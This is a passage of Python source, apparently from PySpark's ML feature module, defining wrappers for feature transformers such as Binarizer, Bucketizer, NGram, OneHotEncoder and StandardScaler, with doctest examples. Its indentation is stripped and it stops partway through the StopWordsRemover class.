from pyspark.rdd import ignore_unicode_prefix
from pyspark.ml.param.shared import *
from pyspark.ml.util import keyword_only
from pyspark.ml.wrapper import JavaEstimator, JavaModel, JavaTransformer, _jvm
from pyspark.mllib.common import inherit_doc
from pyspark.mllib.linalg import _convert_to_vector
__all__ = ['Binarizer', 'Bucketizer', 'DCT', 'ElementwiseProduct', 'HashingTF', 'IDF', 'IDFModel',
'IndexToString', 'NGram', 'Normalizer', 'OneHotEncoder', 'PCA', 'PCAModel',
'PolynomialExpansion', 'RegexTokenizer', 'RFormula', 'RFormulaModel', 'SQLTransformer',
'StandardScaler', 'StandardScalerModel', 'StopWordsRemover', 'StringIndexer',
'StringIndexerModel', 'Tokenizer', 'VectorAssembler', 'VectorIndexer', 'VectorSlicer',
'Word2Vec', 'Word2VecModel']
@inherit_doc
class Binarizer(JavaTransformer, HasInputCol, HasOutputCol):
"""
.. note:: Experimental
Binarize a column of continuous features given a threshold.
>>> df = sqlContext.createDataFrame([(0.5,)], ["values"])
>>> binarizer = Binarizer(threshold=1.0, inputCol="values", outputCol="features")
>>> binarizer.transform(df).head().features
0.0
>>> binarizer.setParams(outputCol="freqs").transform(df).head().freqs
0.0
>>> params = {binarizer.threshold: -0.5, binarizer.outputCol: "vector"}
>>> binarizer.transform(df, params).head().vector
1.0
"""
# a placeholder to make it appear in the generated doc
threshold = Param(Params._dummy(), "threshold",
"threshold in binary classification prediction, in range [0, 1]")
@keyword_only
def __init__(self, threshold=0.0, inputCol=None, outputCol=None):
"""
__init__(self, threshold=0.0, inputCol=None, outputCol=None)
"""
super(Binarizer, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.Binarizer", self.uid)
self.threshold = Param(self, "threshold",
"threshold in binary classification prediction, in range [0, 1]")
self._setDefault(threshold=0.0)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, threshold=0.0, inputCol=None, outputCol=None):
"""
setParams(self, threshold=0.0, inputCol=None, outputCol=None)
Sets params for this Binarizer.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setThreshold(self, value):
"""
Sets the value of :py:attr:`threshold`.
"""
self._paramMap[self.threshold] = value
return self
def getThreshold(self):
"""
Gets the value of threshold or its default value.
"""
return self.getOrDefault(self.threshold)
@inherit_doc
class Bucketizer(JavaTransformer, HasInputCol, HasOutputCol):
"""
.. note:: Experimental
Maps a column of continuous features to a column of feature buckets.
>>> df = sqlContext.createDataFrame([(0.1,), (0.4,), (1.2,), (1.5,)], ["values"])
>>> bucketizer = Bucketizer(splits=[-float("inf"), 0.5, 1.4, float("inf")],
... inputCol="values", outputCol="buckets")
>>> bucketed = bucketizer.transform(df).collect()
>>> bucketed[0].buckets
0.0
>>> bucketed[1].buckets
0.0
>>> bucketed[2].buckets
1.0
>>> bucketed[3].buckets
2.0
>>> bucketizer.setParams(outputCol="b").transform(df).head().b
0.0
"""
# a placeholder to make it appear in the generated doc
splits = \
Param(Params._dummy(), "splits",
"Split points for mapping continuous features into buckets. With n+1 splits, " +
"there are n buckets. A bucket defined by splits x,y holds values in the " +
"range [x,y) except the last bucket, which also includes y. The splits " +
"should be strictly increasing. Values at -inf, inf must be explicitly " +
"provided to cover all Double values; otherwise, values outside the splits " +
"specified will be treated as errors.")
@keyword_only
def __init__(self, splits=None, inputCol=None, outputCol=None):
"""
__init__(self, splits=None, inputCol=None, outputCol=None)
"""
super(Bucketizer, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.Bucketizer", self.uid)
#: param for Splitting points for mapping continuous features into buckets. With n+1 splits,
# there are n buckets. A bucket defined by splits x,y holds values in the range [x,y)
# except the last bucket, which also includes y. The splits should be strictly increasing.
# Values at -inf, inf must be explicitly provided to cover all Double values; otherwise,
# values outside the splits specified will be treated as errors.
self.splits = \
Param(self, "splits",
"Split points for mapping continuous features into buckets. With n+1 splits, " +
"there are n buckets. A bucket defined by splits x,y holds values in the " +
"range [x,y) except the last bucket, which also includes y. The splits " +
"should be strictly increasing. Values at -inf, inf must be explicitly " +
"provided to cover all Double values; otherwise, values outside the splits " +
"specified will be treated as errors.")
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, splits=None, inputCol=None, outputCol=None):
"""
setParams(self, splits=None, inputCol=None, outputCol=None)
Sets params for this Bucketizer.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setSplits(self, value):
"""
Sets the value of :py:attr:`splits`.
"""
self._paramMap[self.splits] = value
return self
def getSplits(self):
"""
Gets the value of threshold or its default value.
"""
return self.getOrDefault(self.splits)
@inherit_doc
class DCT(JavaTransformer, HasInputCol, HasOutputCol):
"""
.. note:: Experimental
A feature transformer that takes the 1D discrete cosine transform
of a real vector. No zero padding is performed on the input vector.
It returns a real vector of the same length representing the DCT.
The return vector is scaled such that the transform matrix is
unitary (aka scaled DCT-II).
More information on
`https://en.wikipedia.org/wiki/Discrete_cosine_transform#DCT-II Wikipedia`.
>>> from pyspark.mllib.linalg import Vectors
>>> df1 = sqlContext.createDataFrame([(Vectors.dense([5.0, 8.0, 6.0]),)], ["vec"])
>>> dct = DCT(inverse=False, inputCol="vec", outputCol="resultVec")
>>> df2 = dct.transform(df1)
>>> df2.head().resultVec
DenseVector([10.969..., -0.707..., -2.041...])
>>> df3 = DCT(inverse=True, inputCol="resultVec", outputCol="origVec").transform(df2)
>>> df3.head().origVec
DenseVector([5.0, 8.0, 6.0])
"""
# a placeholder to make it appear in the generated doc
inverse = Param(Params._dummy(), "inverse", "Set transformer to perform inverse DCT, " +
"default False.")
@keyword_only
def __init__(self, inverse=False, inputCol=None, outputCol=None):
"""
__init__(self, inverse=False, inputCol=None, outputCol=None)
"""
super(DCT, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.DCT", self.uid)
self.inverse = Param(self, "inverse", "Set transformer to perform inverse DCT, " +
"default False.")
self._setDefault(inverse=False)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, inverse=False, inputCol=None, outputCol=None):
"""
setParams(self, inverse=False, inputCol=None, outputCol=None)
Sets params for this DCT.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setInverse(self, value):
"""
Sets the value of :py:attr:`inverse`.
"""
self._paramMap[self.inverse] = value
return self
def getInverse(self):
"""
Gets the value of inverse or its default value.
"""
return self.getOrDefault(self.inverse)
@inherit_doc
class ElementwiseProduct(JavaTransformer, HasInputCol, HasOutputCol):
"""
.. note:: Experimental
Outputs the Hadamard product (i.e., the element-wise product) of each input vector
with a provided "weight" vector. In other words, it scales each column of the dataset
by a scalar multiplier.
>>> from pyspark.mllib.linalg import Vectors
>>> df = sqlContext.createDataFrame([(Vectors.dense([2.0, 1.0, 3.0]),)], ["values"])
>>> ep = ElementwiseProduct(scalingVec=Vectors.dense([1.0, 2.0, 3.0]),
... inputCol="values", outputCol="eprod")
>>> ep.transform(df).head().eprod
DenseVector([2.0, 2.0, 9.0])
>>> ep.setParams(scalingVec=Vectors.dense([2.0, 3.0, 5.0])).transform(df).head().eprod
DenseVector([4.0, 3.0, 15.0])
"""
# a placeholder to make it appear in the generated doc
scalingVec = Param(Params._dummy(), "scalingVec", "vector for hadamard product, " +
"it must be MLlib Vector type.")
@keyword_only
def __init__(self, scalingVec=None, inputCol=None, outputCol=None):
"""
__init__(self, scalingVec=None, inputCol=None, outputCol=None)
"""
super(ElementwiseProduct, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.ElementwiseProduct",
self.uid)
self.scalingVec = Param(self, "scalingVec", "vector for hadamard product, " +
"it must be MLlib Vector type.")
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, scalingVec=None, inputCol=None, outputCol=None):
"""
setParams(self, scalingVec=None, inputCol=None, outputCol=None)
Sets params for this ElementwiseProduct.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setScalingVec(self, value):
"""
Sets the value of :py:attr:`scalingVec`.
"""
self._paramMap[self.scalingVec] = value
return self
def getScalingVec(self):
"""
Gets the value of scalingVec or its default value.
"""
return self.getOrDefault(self.scalingVec)
@inherit_doc
class HashingTF(JavaTransformer, HasInputCol, HasOutputCol, HasNumFeatures):
"""
.. note:: Experimental
Maps a sequence of terms to their term frequencies using the
hashing trick.
>>> df = sqlContext.createDataFrame([(["a", "b", "c"],)], ["words"])
>>> hashingTF = HashingTF(numFeatures=10, inputCol="words", outputCol="features")
>>> hashingTF.transform(df).head().features
SparseVector(10, {7: 1.0, 8: 1.0, 9: 1.0})
>>> hashingTF.setParams(outputCol="freqs").transform(df).head().freqs
SparseVector(10, {7: 1.0, 8: 1.0, 9: 1.0})
>>> params = {hashingTF.numFeatures: 5, hashingTF.outputCol: "vector"}
>>> hashingTF.transform(df, params).head().vector
SparseVector(5, {2: 1.0, 3: 1.0, 4: 1.0})
"""
@keyword_only
def __init__(self, numFeatures=1 << 18, inputCol=None, outputCol=None):
"""
__init__(self, numFeatures=1 << 18, inputCol=None, outputCol=None)
"""
super(HashingTF, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.HashingTF", self.uid)
self._setDefault(numFeatures=1 << 18)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, numFeatures=1 << 18, inputCol=None, outputCol=None):
"""
setParams(self, numFeatures=1 << 18, inputCol=None, outputCol=None)
Sets params for this HashingTF.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
@inherit_doc
class IDF(JavaEstimator, HasInputCol, HasOutputCol):
"""
.. note:: Experimental
Compute the Inverse Document Frequency (IDF) given a collection of documents.
>>> from pyspark.mllib.linalg import DenseVector
>>> df = sqlContext.createDataFrame([(DenseVector([1.0, 2.0]),),
... (DenseVector([0.0, 1.0]),), (DenseVector([3.0, 0.2]),)], ["tf"])
>>> idf = IDF(minDocFreq=3, inputCol="tf", outputCol="idf")
>>> idf.fit(df).transform(df).head().idf
DenseVector([0.0, 0.0])
>>> idf.setParams(outputCol="freqs").fit(df).transform(df).collect()[1].freqs
DenseVector([0.0, 0.0])
>>> params = {idf.minDocFreq: 1, idf.outputCol: "vector"}
>>> idf.fit(df, params).transform(df).head().vector
DenseVector([0.2877, 0.0])
"""
# a placeholder to make it appear in the generated doc
minDocFreq = Param(Params._dummy(), "minDocFreq",
"minimum of documents in which a term should appear for filtering")
@keyword_only
def __init__(self, minDocFreq=0, inputCol=None, outputCol=None):
"""
__init__(self, minDocFreq=0, inputCol=None, outputCol=None)
"""
super(IDF, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.IDF", self.uid)
self.minDocFreq = Param(self, "minDocFreq",
"minimum of documents in which a term should appear for filtering")
self._setDefault(minDocFreq=0)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, minDocFreq=0, inputCol=None, outputCol=None):
"""
setParams(self, minDocFreq=0, inputCol=None, outputCol=None)
Sets params for this IDF.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setMinDocFreq(self, value):
"""
Sets the value of :py:attr:`minDocFreq`.
"""
self._paramMap[self.minDocFreq] = value
return self
def getMinDocFreq(self):
"""
Gets the value of minDocFreq or its default value.
"""
return self.getOrDefault(self.minDocFreq)
def _create_model(self, java_model):
return IDFModel(java_model)
class IDFModel(JavaModel):
"""
.. note:: Experimental
Model fitted by IDF.
"""
@inherit_doc
@ignore_unicode_prefix
class NGram(JavaTransformer, HasInputCol, HasOutputCol):
"""
.. note:: Experimental
A feature transformer that converts the input array of strings into an array of n-grams. Null
values in the input array are ignored.
It returns an array of n-grams where each n-gram is represented by a space-separated string of
words.
When the input is empty, an empty array is returned.
When the input array length is less than n (number of elements per n-gram), no n-grams are
returned.
>>> df = sqlContext.createDataFrame([Row(inputTokens=["a", "b", "c", "d", "e"])])
>>> ngram = NGram(n=2, inputCol="inputTokens", outputCol="nGrams")
>>> ngram.transform(df).head()
Row(inputTokens=[u'a', u'b', u'c', u'd', u'e'], nGrams=[u'a b', u'b c', u'c d', u'd e'])
>>> # Change n-gram length
>>> ngram.setParams(n=4).transform(df).head()
Row(inputTokens=[u'a', u'b', u'c', u'd', u'e'], nGrams=[u'a b c d', u'b c d e'])
>>> # Temporarily modify output column.
>>> ngram.transform(df, {ngram.outputCol: "output"}).head()
Row(inputTokens=[u'a', u'b', u'c', u'd', u'e'], output=[u'a b c d', u'b c d e'])
>>> ngram.transform(df).head()
Row(inputTokens=[u'a', u'b', u'c', u'd', u'e'], nGrams=[u'a b c d', u'b c d e'])
>>> # Must use keyword arguments to specify params.
>>> ngram.setParams("text")
Traceback (most recent call last):
...
TypeError: Method setParams forces keyword arguments.
"""
# a placeholder to make it appear in the generated doc
n = Param(Params._dummy(), "n", "number of elements per n-gram (>=1)")
@keyword_only
def __init__(self, n=2, inputCol=None, outputCol=None):
"""
__init__(self, n=2, inputCol=None, outputCol=None)
"""
super(NGram, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.NGram", self.uid)
self.n = Param(self, "n", "number of elements per n-gram (>=1)")
self._setDefault(n=2)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, n=2, inputCol=None, outputCol=None):
"""
setParams(self, n=2, inputCol=None, outputCol=None)
Sets params for this NGram.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setN(self, value):
"""
Sets the value of :py:attr:`n`.
"""
self._paramMap[self.n] = value
return self
def getN(self):
"""
Gets the value of n or its default value.
"""
return self.getOrDefault(self.n)
@inherit_doc
class Normalizer(JavaTransformer, HasInputCol, HasOutputCol):
"""
.. note:: Experimental
Normalize a vector to have unit norm using the given p-norm.
>>> from pyspark.mllib.linalg import Vectors
>>> svec = Vectors.sparse(4, {1: 4.0, 3: 3.0})
>>> df = sqlContext.createDataFrame([(Vectors.dense([3.0, -4.0]), svec)], ["dense", "sparse"])
>>> normalizer = Normalizer(p=2.0, inputCol="dense", outputCol="features")
>>> normalizer.transform(df).head().features
DenseVector([0.6, -0.8])
>>> normalizer.setParams(inputCol="sparse", outputCol="freqs").transform(df).head().freqs
SparseVector(4, {1: 0.8, 3: 0.6})
>>> params = {normalizer.p: 1.0, normalizer.inputCol: "dense", normalizer.outputCol: "vector"}
>>> normalizer.transform(df, params).head().vector
DenseVector([0.4286, -0.5714])
"""
# a placeholder to make it appear in the generated doc
p = Param(Params._dummy(), "p", "the p norm value.")
@keyword_only
def __init__(self, p=2.0, inputCol=None, outputCol=None):
"""
__init__(self, p=2.0, inputCol=None, outputCol=None)
"""
super(Normalizer, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.Normalizer", self.uid)
self.p = Param(self, "p", "the p norm value.")
self._setDefault(p=2.0)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, p=2.0, inputCol=None, outputCol=None):
"""
setParams(self, p=2.0, inputCol=None, outputCol=None)
Sets params for this Normalizer.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setP(self, value):
"""
Sets the value of :py:attr:`p`.
"""
self._paramMap[self.p] = value
return self
def getP(self):
"""
Gets the value of p or its default value.
"""
return self.getOrDefault(self.p)
@inherit_doc
class OneHotEncoder(JavaTransformer, HasInputCol, HasOutputCol):
"""
.. note:: Experimental
A one-hot encoder that maps a column of category indices to a
column of binary vectors, with at most a single one-value per row
that indicates the input category index.
For example with 5 categories, an input value of 2.0 would map to
an output vector of `[0.0, 0.0, 1.0, 0.0]`.
The last category is not included by default (configurable via
:py:attr:`dropLast`) because it makes the vector entries sum up to
one, and hence linearly dependent.
So an input value of 4.0 maps to `[0.0, 0.0, 0.0, 0.0]`.
Note that this is different from scikit-learn's OneHotEncoder,
which keeps all categories.
The output vectors are sparse.
.. seealso::
:py:class:`StringIndexer` for converting categorical values into
category indices
>>> stringIndexer = StringIndexer(inputCol="label", outputCol="indexed")
>>> model = stringIndexer.fit(stringIndDf)
>>> td = model.transform(stringIndDf)
>>> encoder = OneHotEncoder(inputCol="indexed", outputCol="features")
>>> encoder.transform(td).head().features
SparseVector(2, {0: 1.0})
>>> encoder.setParams(outputCol="freqs").transform(td).head().freqs
SparseVector(2, {0: 1.0})
>>> params = {encoder.dropLast: False, encoder.outputCol: "test"}
>>> encoder.transform(td, params).head().test
SparseVector(3, {0: 1.0})
"""
# a placeholder to make it appear in the generated doc
dropLast = Param(Params._dummy(), "dropLast", "whether to drop the last category")
@keyword_only
def __init__(self, dropLast=True, inputCol=None, outputCol=None):
"""
__init__(self, includeFirst=True, inputCol=None, outputCol=None)
"""
super(OneHotEncoder, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.OneHotEncoder", self.uid)
self.dropLast = Param(self, "dropLast", "whether to drop the last category")
self._setDefault(dropLast=True)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, dropLast=True, inputCol=None, outputCol=None):
"""
setParams(self, dropLast=True, inputCol=None, outputCol=None)
Sets params for this OneHotEncoder.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setDropLast(self, value):
"""
Sets the value of :py:attr:`dropLast`.
"""
self._paramMap[self.dropLast] = value
return self
def getDropLast(self):
"""
Gets the value of dropLast or its default value.
"""
return self.getOrDefault(self.dropLast)
@inherit_doc
class PolynomialExpansion(JavaTransformer, HasInputCol, HasOutputCol):
"""
.. note:: Experimental
Perform feature expansion in a polynomial space. As said in wikipedia of Polynomial Expansion,
which is available at `http://en.wikipedia.org/wiki/Polynomial_expansion`, "In mathematics, an
expansion of a product of sums expresses it as a sum of products by using the fact that
multiplication distributes over addition". Take a 2-variable feature vector as an example:
`(x, y)`, if we want to expand it with degree 2, then we get `(x, x * x, y, x * y, y * y)`.
>>> from pyspark.mllib.linalg import Vectors
>>> df = sqlContext.createDataFrame([(Vectors.dense([0.5, 2.0]),)], ["dense"])
>>> px = PolynomialExpansion(degree=2, inputCol="dense", outputCol="expanded")
>>> px.transform(df).head().expanded
DenseVector([0.5, 0.25, 2.0, 1.0, 4.0])
>>> px.setParams(outputCol="test").transform(df).head().test
DenseVector([0.5, 0.25, 2.0, 1.0, 4.0])
"""
# a placeholder to make it appear in the generated doc
degree = Param(Params._dummy(), "degree", "the polynomial degree to expand (>= 1)")
@keyword_only
def __init__(self, degree=2, inputCol=None, outputCol=None):
"""
__init__(self, degree=2, inputCol=None, outputCol=None)
"""
super(PolynomialExpansion, self).__init__()
self._java_obj = self._new_java_obj(
"org.apache.spark.ml.feature.PolynomialExpansion", self.uid)
self.degree = Param(self, "degree", "the polynomial degree to expand (>= 1)")
self._setDefault(degree=2)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, degree=2, inputCol=None, outputCol=None):
"""
setParams(self, degree=2, inputCol=None, outputCol=None)
Sets params for this PolynomialExpansion.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setDegree(self, value):
"""
Sets the value of :py:attr:`degree`.
"""
self._paramMap[self.degree] = value
return self
def getDegree(self):
"""
Gets the value of degree or its default value.
"""
return self.getOrDefault(self.degree)
@inherit_doc
@ignore_unicode_prefix
class RegexTokenizer(JavaTransformer, HasInputCol, HasOutputCol):
"""
.. note:: Experimental
A regex based tokenizer that extracts tokens either by using the
provided regex pattern (in Java dialect) to split the text
(default) or repeatedly matching the regex (if gaps is false).
Optional parameters also allow filtering tokens using a minimal
length.
It returns an array of strings that can be empty.
>>> df = sqlContext.createDataFrame([("a b c",)], ["text"])
>>> reTokenizer = RegexTokenizer(inputCol="text", outputCol="words")
>>> reTokenizer.transform(df).head()
Row(text=u'a b c', words=[u'a', u'b', u'c'])
>>> # Change a parameter.
>>> reTokenizer.setParams(outputCol="tokens").transform(df).head()
Row(text=u'a b c', tokens=[u'a', u'b', u'c'])
>>> # Temporarily modify a parameter.
>>> reTokenizer.transform(df, {reTokenizer.outputCol: "words"}).head()
Row(text=u'a b c', words=[u'a', u'b', u'c'])
>>> reTokenizer.transform(df).head()
Row(text=u'a b c', tokens=[u'a', u'b', u'c'])
>>> # Must use keyword arguments to specify params.
>>> reTokenizer.setParams("text")
Traceback (most recent call last):
...
TypeError: Method setParams forces keyword arguments.
"""
# a placeholder to make it appear in the generated doc
minTokenLength = Param(Params._dummy(), "minTokenLength", "minimum token length (>= 0)")
gaps = Param(Params._dummy(), "gaps", "whether regex splits on gaps (True) or matches tokens")
pattern = Param(Params._dummy(), "pattern", "regex pattern (Java dialect) used for tokenizing")
@keyword_only
def __init__(self, minTokenLength=1, gaps=True, pattern="\\s+", inputCol=None, outputCol=None):
"""
__init__(self, minTokenLength=1, gaps=True, pattern="\\s+", inputCol=None, outputCol=None)
"""
super(RegexTokenizer, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.RegexTokenizer", self.uid)
self.minTokenLength = Param(self, "minTokenLength", "minimum token length (>= 0)")
self.gaps = Param(self, "gaps", "whether regex splits on gaps (True) or matches tokens")
self.pattern = Param(self, "pattern", "regex pattern (Java dialect) used for tokenizing")
self._setDefault(minTokenLength=1, gaps=True, pattern="\\s+")
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, minTokenLength=1, gaps=True, pattern="\\s+", inputCol=None, outputCol=None):
"""
setParams(self, minTokenLength=1, gaps=True, pattern="\\s+", inputCol=None, outputCol=None)
Sets params for this RegexTokenizer.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setMinTokenLength(self, value):
"""
Sets the value of :py:attr:`minTokenLength`.
"""
self._paramMap[self.minTokenLength] = value
return self
def getMinTokenLength(self):
"""
Gets the value of minTokenLength or its default value.
"""
return self.getOrDefault(self.minTokenLength)
def setGaps(self, value):
"""
Sets the value of :py:attr:`gaps`.
"""
self._paramMap[self.gaps] = value
return self
def getGaps(self):
"""
Gets the value of gaps or its default value.
"""
return self.getOrDefault(self.gaps)
def setPattern(self, value):
"""
Sets the value of :py:attr:`pattern`.
"""
self._paramMap[self.pattern] = value
return self
def getPattern(self):
"""
Gets the value of pattern or its default value.
"""
return self.getOrDefault(self.pattern)
@inherit_doc
class SQLTransformer(JavaTransformer):
"""
.. note:: Experimental
Implements the transforms which are defined by SQL statement.
Currently we only support SQL syntax like 'SELECT ... FROM __THIS__'
where '__THIS__' represents the underlying table of the input dataset.
>>> df = sqlContext.createDataFrame([(0, 1.0, 3.0), (2, 2.0, 5.0)], ["id", "v1", "v2"])
>>> sqlTrans = SQLTransformer(
... statement="SELECT *, (v1 + v2) AS v3, (v1 * v2) AS v4 FROM __THIS__")
>>> sqlTrans.transform(df).head()
Row(id=0, v1=1.0, v2=3.0, v3=4.0, v4=3.0)
"""
# a placeholder to make it appear in the generated doc
statement = Param(Params._dummy(), "statement", "SQL statement")
@keyword_only
def __init__(self, statement=None):
"""
__init__(self, statement=None)
"""
super(SQLTransformer, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.SQLTransformer", self.uid)
self.statement = Param(self, "statement", "SQL statement")
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, statement=None):
"""
setParams(self, statement=None)
Sets params for this SQLTransformer.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setStatement(self, value):
"""
Sets the value of :py:attr:`statement`.
"""
self._paramMap[self.statement] = value
return self
def getStatement(self):
"""
Gets the value of statement or its default value.
"""
return self.getOrDefault(self.statement)
@inherit_doc
class StandardScaler(JavaEstimator, HasInputCol, HasOutputCol):
"""
.. note:: Experimental
Standardizes features by removing the mean and scaling to unit variance using column summary
statistics on the samples in the training set.
>>> from pyspark.mllib.linalg import Vectors
>>> df = sqlContext.createDataFrame([(Vectors.dense([0.0]),), (Vectors.dense([2.0]),)], ["a"])
>>> standardScaler = StandardScaler(inputCol="a", outputCol="scaled")
>>> model = standardScaler.fit(df)
>>> model.mean
DenseVector([1.0])
>>> model.std
DenseVector([1.4142])
>>> model.transform(df).collect()[1].scaled
DenseVector([1.4142])
"""
# a placeholder to make it appear in the generated doc
withMean = Param(Params._dummy(), "withMean", "Center data with mean")
withStd = Param(Params._dummy(), "withStd", "Scale to unit standard deviation")
@keyword_only
def __init__(self, withMean=False, withStd=True, inputCol=None, outputCol=None):
"""
__init__(self, withMean=False, withStd=True, inputCol=None, outputCol=None)
"""
super(StandardScaler, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.StandardScaler", self.uid)
self.withMean = Param(self, "withMean", "Center data with mean")
self.withStd = Param(self, "withStd", "Scale to unit standard deviation")
self._setDefault(withMean=False, withStd=True)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, withMean=False, withStd=True, inputCol=None, outputCol=None):
"""
setParams(self, withMean=False, withStd=True, inputCol=None, outputCol=None)
Sets params for this StandardScaler.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setWithMean(self, value):
"""
Sets the value of :py:attr:`withMean`.
"""
self._paramMap[self.withMean] = value
return self
def getWithMean(self):
"""
Gets the value of withMean or its default value.
"""
return self.getOrDefault(self.withMean)
def setWithStd(self, value):
"""
Sets the value of :py:attr:`withStd`.
"""
self._paramMap[self.withStd] = value
return self
def getWithStd(self):
"""
Gets the value of withStd or its default value.
"""
return self.getOrDefault(self.withStd)
def _create_model(self, java_model):
return StandardScalerModel(java_model)
class StandardScalerModel(JavaModel):
"""
.. note:: Experimental
Model fitted by StandardScaler.
"""
@property
def std(self):
"""
Standard deviation of the StandardScalerModel.
"""
return self._call_java("std")
@property
def mean(self):
"""
Mean of the StandardScalerModel.
"""
return self._call_java("mean")
@inherit_doc
class StringIndexer(JavaEstimator, HasInputCol, HasOutputCol):
"""
.. note:: Experimental
A label indexer that maps a string column of labels to an ML column of label indices.
If the input column is numeric, we cast it to string and index the string values.
The indices are in [0, numLabels), ordered by label frequencies.
So the most frequent label gets index 0.
>>> stringIndexer = StringIndexer(inputCol="label", outputCol="indexed")
>>> model = stringIndexer.fit(stringIndDf)
>>> td = model.transform(stringIndDf)
>>> sorted(set([(i[0], i[1]) for i in td.select(td.id, td.indexed).collect()]),
... key=lambda x: x[0])
[(0, 0.0), (1, 2.0), (2, 1.0), (3, 0.0), (4, 0.0), (5, 1.0)]
>>> inverter = IndexToString(inputCol="indexed", outputCol="label2", labels=model.labels())
>>> itd = inverter.transform(td)
>>> sorted(set([(i[0], str(i[1])) for i in itd.select(itd.id, itd.label2).collect()]),
... key=lambda x: x[0])
[(0, 'a'), (1, 'b'), (2, 'c'), (3, 'a'), (4, 'a'), (5, 'c')]
"""
@keyword_only
def __init__(self, inputCol=None, outputCol=None):
"""
__init__(self, inputCol=None, outputCol=None)
"""
super(StringIndexer, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.StringIndexer", self.uid)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, inputCol=None, outputCol=None):
"""
setParams(self, inputCol=None, outputCol=None)
Sets params for this StringIndexer.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def _create_model(self, java_model):
return StringIndexerModel(java_model)
class StringIndexerModel(JavaModel):
"""
.. note:: Experimental
Model fitted by StringIndexer.
"""
@property
def labels(self):
"""
Ordered list of labels, corresponding to indices to be assigned.
"""
return self._java_obj.labels
@inherit_doc
class IndexToString(JavaTransformer, HasInputCol, HasOutputCol):
"""
.. note:: Experimental
A :py:class:`Transformer` that maps a column of string indices back to a new column of
corresponding string values using either the ML attributes of the input column, or if
provided using the labels supplied by the user.
All original columns are kept during transformation.
See L{StringIndexer} for converting strings into indices.
"""
# a placeholder to make the labels show up in generated doc
labels = Param(Params._dummy(), "labels",
"Optional array of labels to be provided by the user, if not supplied or " +
"empty, column metadata is read for labels")
@keyword_only
def __init__(self, inputCol=None, outputCol=None, labels=None):
"""
__init__(self, inputCol=None, outputCol=None, labels=None)
"""
super(IndexToString, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.IndexToString",
self.uid)
self.labels = Param(self, "labels",
"Optional array of labels to be provided by the user, if not " +
"supplied or empty, column metadata is read for labels")
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, inputCol=None, outputCol=None, labels=None):
"""
setParams(self, inputCol=None, outputCol=None, labels=None)
Sets params for this IndexToString.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setLabels(self, value):
"""
Sets the value of :py:attr:`labels`.
"""
self._paramMap[self.labels] = value
return self
def getLabels(self):
"""
Gets the value of :py:attr:`labels` or its default value.
"""
return self.getOrDefault(self.labels)
class StopWordsRemover(JavaTransformer, HasInputCol, HasOutputCol):
"""
.. note:: Experimental
A feature transformer that filters out stop words from input.
Note: null values from input array are preserved unless adding null to stopWords explicitly.
"""
# a placeholder to make the stopwords show up in generated doc
stopWords = Param(Params._dummy(), "stopWords", "The words to be filtered out")
caseSensitive = Param(Params._dummy(), "caseSensitive", "whether to do a case sensitive " +
"comparison over the stop words")
@keyword_only
def __init__(self, inputCol=None, outputCol=None, stopWords=None,
caseSensitive=False):
"""
__init__(self, inputCol=None, outputCol=None, stopWords=None,\
caseSensitive=false)
"""
super(StopWordsRemover, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.StopWordsRemover",
self.uid)
self.stopWords = Param(self, "stopWords", "The words to be filtered out")
self.caseSensitive = Param(self, "caseSensitive", "whether to do a case " +
"sensitive comparison over the stop words")
stopWordsObj = _jvm().org.apache.spark.ml.feature.StopWords
